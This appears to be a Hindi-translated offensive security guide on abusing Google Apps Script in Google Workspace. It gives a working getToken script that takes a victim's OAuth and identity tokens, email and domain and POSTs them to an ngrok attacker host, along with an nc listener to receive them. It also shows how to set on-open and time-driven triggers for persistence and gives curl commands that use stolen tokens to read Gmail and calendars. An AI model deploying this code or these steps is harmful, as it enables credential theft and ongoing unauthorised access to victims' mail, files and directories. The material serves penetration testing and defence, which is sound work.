GWS - App Scripts

Reading time: 9 minutes

App Scripts

App Scripts वह कोड है जो तब सक्रिय होगा जब कोई संपादक अनुमति वाला उपयोगकर्ता उस दस्तावेज़ तक पहुँचता है जिसके साथ App Script जुड़ा हुआ है और OAuth प्रॉम्प्ट स्वीकार करने के बाद।
इन्हें App Script के मालिक द्वारा हर निश्चित समय पर निष्पादित करने के लिए भी सेट किया जा सकता है (Persistence).

App Script बनाना

App Script बनाने के कई तरीके हैं, हालांकि सबसे सामान्य तरीके Google Document (किसी भी प्रकार का) से और स्वतंत्र परियोजना के रूप में हैं:

App Script परिदृश्य

App Script के साथ Google Sheet बनाएं

एक App Script बनाने से शुरू करें, इस परिदृश्य के लिए मेरी सिफारिश है कि आप एक Google Sheet बनाएं और Extensions > App Scripts पर जाएं, इससे आपके लिए शीट से जुड़ी एक नई App Script खुलेगी।

टोकन लीक

OAuth टोकन तक पहुँच देने के लिए आपको Services + पर क्लिक करना होगा और जैसे स्कोप जोड़ना होगा:

• AdminDirectory: निर्देशिका के उपयोगकर्ताओं और समूहों तक पहुँच (यदि उपयोगकर्ता के पास पर्याप्त अनुमतियाँ हैं)
• Gmail: Gmail डेटा तक पहुँचने के लिए
• Drive: ड्राइव डेटा तक पहुँचने के लिए
• Google Sheets API: ताकि यह ट्रिगर के साथ काम करे

अपने लिए आवश्यक स्कोप बदलने के लिए आप प्रोजेक्ट सेटिंग्स में जा सकते हैं और सक्षम कर सकते हैं: Show "appsscript.json" manifest file in editor.

function getToken() {
var userEmail = Session.getActiveUser().getEmail()
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
var oauthToken = ScriptApp.getOAuthToken()
var identityToken = ScriptApp.getIdentityToken()

// Data json
data = {
oauthToken: oauthToken,
identityToken: identityToken,
email: userEmail,
domain: domain,
}

// Send data
makePostRequest(data)

// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions

// To ask for AdminDirectory permissions
var pageToken = ""
page = AdminDirectory.Users.list({
domain: domain, // Use the extracted domain
orderBy: "givenName",
maxResults: 100,
pageToken: pageToken,
})

// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10)

// To ask for drive permissions
var files = DriveApp.getFiles()
}

function makePostRequest(data) {
var url = "http://5.tcp.eu.ngrok.io:12027"

var options = {
method: "post",
contentType: "application/json",
payload: JSON.stringify(data),
}

try {
UrlFetchApp.fetch(url, options)
} catch (e) {
Logger.log("Error making POST request: " + e.toString())
}
}

अनुरोध को कैप्चर करने के लिए आप बस चला सकते हैं:

ngrok tcp 4444
nc -lv 4444 #macOS

अनुप्रयोग स्क्रिप्ट को निष्पादित करने के लिए अनुरोधित अनुमतियाँ:

ट्रिगर बनाना

एक बार जब अनुप्रयोग पढ़ लिया जाए, तो ⏰ ट्रिगर्स पर क्लिक करें ताकि एक ट्रिगर बनाया जा सके। कार्य के रूप में getToken चुनें, जो तैनाती पर Head पर चलता है, घटना स्रोत में From spreadsheet चुनें और घटना प्रकार में On open या On edit (आपकी आवश्यकताओं के अनुसार) चुनें और सहेजें।

ध्यान दें कि यदि आप कुछ डिबग करना चाहते हैं तो आप एक्जीक्यूशंस टैब में अनुप्रयोग स्क्रिप्ट के रन की जांच कर सकते हैं।

साझा करना

App Script को ट्रिगर करने के लिए पीड़ित को संपादक पहुंच के साथ कनेक्ट करना होगा।

साझा किए गए दस्तावेज़ों का दुरुपयोग करना

साझा करने के बजाय कॉपी करना

जब आप एक दस्तावेज़ साझा करने के लिए एक लिंक बनाते हैं, तो एक लिंक इस तरह का बनाया जाता है: https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit
यदि आप "/edit" के अंत को "/copy" में बदलते हैं, तो इसे एक्सेस करने के बजाय गूगल आपसे पूछेगा कि क्या आप दस्तावेज़ की एक प्रति उत्पन्न करना चाहते हैं:

यदि उपयोगकर्ता इसे कॉपी करता है और इसे एक्सेस करता है, तो दस्तावेज़ की सामग्री और App Scripts दोनों को कॉपी किया जाएगा, हालाँकि ट्रिगर नहीं होंगे, इसलिए कुछ भी निष्पादित नहीं होगा।

वेब एप्लिकेशन के रूप में साझा करना

ध्यान दें कि App Script को वेब एप्लिकेशन के रूप में साझा करना भी संभव है (App Script के संपादक में, वेब एप्लिकेशन के रूप में तैनात करें), लेकिन इस तरह का एक अलर्ट दिखाई देगा:

इसके बाद आवश्यक अनुमतियों के लिए विशिष्ट OAuth प्रॉम्प्ट आएगा।

परीक्षण

आप एकत्रित टोकन का परीक्षण कर सकते हैं ताकि ईमेल सूचीबद्ध किया जा सके:

curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"

उपयोगकर्ता का कैलेंडर सूचीबद्ध करें:

curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"

App Script के रूप में स्थिरता

स्थिरता के लिए एक विकल्प होगा एक दस्तावेज़ बनाना और getToken फ़ंक्शन के लिए एक ट्रिगर जोड़ना और दस्तावेज़ को हमलावर के साथ साझा करना ताकि हर बार जब हमलावर फ़ाइल खोलता है, वह पीड़ित का टोकन निकालता है।

यह भी संभव है कि एक App Script बनाई जाए और इसे हर X समय (जैसे हर मिनट, घंटे, दिन...) ट्रिगर किया जाए। एक हमलावर जिसने पीड़ित के क्रेडेंशियल्स या सत्र को समझौता किया है, वह एक App Script समय ट्रिगर सेट कर सकता है और हर दिन एक बहुत ही विशेषाधिकार प्राप्त OAuth टोकन लीक कर सकता है:

बस एक App Script बनाएं, ट्रिगर्स पर जाएं, Add Trigger पर क्लिक करें, और घटना स्रोत के रूप में Time-driven चुनें और उन विकल्पों का चयन करें जो आपके लिए सबसे उपयुक्त हैं:

साझा दस्तावेज़ अवेरिफाइड प्रॉम्प्ट बायपास

इसके अलावा, यदि किसी ने आपके साथ संपादक पहुंच के साथ एक दस्तावेज़ साझा किया है, तो आप दस्तावेज़ के अंदर App Scripts उत्पन्न कर सकते हैं और दस्तावेज़ का OWNER (निर्माता) App Script का मालिक होगा।